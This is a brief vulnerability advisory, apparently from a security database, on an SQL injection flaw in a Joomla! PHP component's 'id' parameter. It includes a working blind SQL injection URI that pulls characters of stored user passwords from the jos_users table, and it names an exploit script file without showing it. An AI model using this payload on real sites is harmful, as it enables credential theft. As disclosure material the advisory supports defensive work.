Joomla! 'joomla-php' Component 'id' Parameter SQL Injection Vulnerability

Joomla! 'joomla-php' Component 'id' Parameter SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URI is available:

http://www.example.com/path/index.php?option=com_php&Itemid=70&id=131+and+ascii(substring((SELECT+concat(password)+from+jos_users+limit+0,1),1,1))=57

The following exploit code is available:

/data/vulnerabilities/exploits/35515.pl